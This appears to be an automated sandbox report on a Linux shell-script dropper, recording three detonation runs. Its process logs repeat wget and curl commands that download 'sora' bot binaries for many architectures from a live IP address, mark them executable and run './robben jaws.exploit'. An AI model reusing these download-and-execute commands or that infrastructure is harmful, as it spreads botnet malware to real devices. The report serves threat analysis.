Analysis Overview
SHA256
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
Threat Level: Shows suspicious behavior
The file 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 01:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.17:443 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
debian9-armhf-20240611-en
Max time kernel
37s
Max time network
41s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
debian9-mipsbe-20240729-en
Max time kernel
34s
Max time network
33s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
